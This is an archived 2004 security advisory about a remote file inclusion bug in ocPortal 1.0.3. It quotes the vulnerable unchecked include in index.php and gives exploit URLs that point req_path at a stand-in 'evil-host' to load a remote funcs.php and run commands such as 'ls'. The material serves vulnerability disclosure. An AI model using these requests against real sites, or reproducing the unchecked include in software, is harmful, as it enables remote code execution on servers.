TUCoPS :: Web :: CMS / Portals :: hack3118.htm

ocPortal 1.0.3 Remote file inclusion bug
[hackgen-2004-#002] - Remote file inclusion bug in ocPortal 1.0.3. 



http://www.hackgen.org/advisories/hackgen-2004-002.txt 



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

'                          [hackgen-2004-#002]                       '

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

'          Remote file inclusion bug in ocPortal 1.0.3.              '

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

  

  Software: ocPortal <= 1.0.3

  Homepage: http://ocportal.com 

  Author: "Exoduks" - HackGen Team

  Release Date: 11 October, 2004

  Website: www.hackgen.org 

  Mail: exoduks [at] gmail . com

  

 



 0x01 - Affected software description:

 -------------------------------------

 ocPortal is the leader in community CMS and portal software for the web. 

 It allows you to create and configure your own website within minutes. 

 It's packed full of innovative features that you will not find in competing 

 software (such as support for multi-site networks, or flexible page view 

 permissions), taking a completely different approach to the mainstream 

 competition. ocPortal can seamlessly integrate with most major forum systems, 

 has an innovative point system for your members to enjoy, support for all your 

 content (downloads, banners, galleries, and more), the ability to add new pages 

 as easily as writing a text file, and produces robust and standard compliant 

 pages. No other CMS package can do all of that.  

                                                   // from ocportal.com







 0x02 - Vulnerability Discription:

 ---------------------------------

 This vulnerability exists in index.php because there isn't a check for 

 path in $req_path variable. So we can change the path to some evil host were

 the funcs.php script is and we can even run some system command with the evil 

 script. I have mentioned that you can run system commands with evil script so

 this is very critical bug. I sugest you that you immediatly get new version 

 of this portal.

 





 0x03 - Vulnerability Code:

 --------------------------

 Vulnerability code is at the beagining of index.php 



 ----- beging the code in index.php -----



  if (!isset($req_path)) $req_path="";

  require_once($req_path."funcs.php");



 ----- end of the code -----







 0x04 - How to fix this bug:

 ---------------------------

 Vendor has already publish new scipt with this fix and you can get new versions 

 of this portal from http://ocportal.com/ 







 0x05 - Exploit:

 ----------------



 http://localhost/ocp-103/index.php?req_path=http://evil-host/ 



 On your evil host you must put scipt funcs.php.

 Example of funcs.php if your host doesn't support php.



   



  Example of funcs.php if your host support php.



   ';

   ?>

 

  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls 







 0x006 - The End:

 ----------------

 The end of my second advisor. There will be more advisories but i don't know

 when :). Till then you can visit http://forum.hackgen.org. 

 Grettzz to: All croatian people expecialy Downbload !







                         ______________________________________

                          Written By Exoduks - www.hackgen.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH